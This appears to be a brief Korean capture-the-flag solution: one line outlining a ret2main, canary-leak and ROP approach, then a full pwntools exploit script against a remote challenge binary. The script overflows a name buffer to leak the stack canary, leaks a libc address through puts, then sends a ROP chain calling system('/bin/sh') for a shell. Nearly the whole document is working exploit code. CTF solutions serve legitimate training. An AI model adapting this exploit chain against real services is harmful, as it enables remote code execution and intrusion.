Ret2Main 후 Canary-Leak 이후 ROP 하면 된다.

from pwn import *

p = remote('server.sqli.kr',30003)
#p = process('./your_name')
e = ELF('./your_name')
libc = ELF('./libc.so.6')

context.arch = 'amd64'
context.log_level = 'debug'

def slog(name,addr): return success(": ".join([name,hex(addr)]))

pop_rbp_ret = 0x00000000004006b8
pop_rdi_ret = 0x00000000004008d3
pop_rsi_pop_r15_ret = 0x00000000004008d1

leak_canary = b'A'*313
p.send(leak_canary)

p.recvuntil("A"*313)
canary = (b'\\x00' + p.recv(7))
p.sendlineafter(b'quit? ',b'n')

payload = b'A'*312
payload += canary
payload += p64(0x00000000004005d6)
payload += p64(pop_rdi_ret)
payload += p64(e.bss()) #+ p64(pop_rsi_pop_r15_ret) + p64(e.bss()) + p64(500)
payload += p64(e.plt['puts'])
payload += p64(e.symbols['main'])
#payload += p64(e.plt['puts'])

p.sendafter(b'name?',payload)
p.sendlineafter(b'?', b'y')

stdout = p.recvline().strip() + b'\\x00\\x00'
libc_base = int.from_bytes(stdout, byteorder='little') - libc.symbols['_IO_2_1_stdout_']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh'))

# gdb.attach(p,'''
#     b*0x0000000000400865
# ''')

slog("stdout", int.from_bytes(stdout, byteorder='little'))
slog("libc_base", libc_base)
slog("system", system)
slog("bin_sh", bin_sh)

payload = b'A'*312
payload += canary
payload += p64(0x0000000000400865)
payload += p64(pop_rsi_pop_r15_ret) + p64(0) + p64(0)
payload += p64(pop_rdi_ret)
payload += p64(bin_sh)
payload += p64(system)

p.sendafter(b'name?',payload)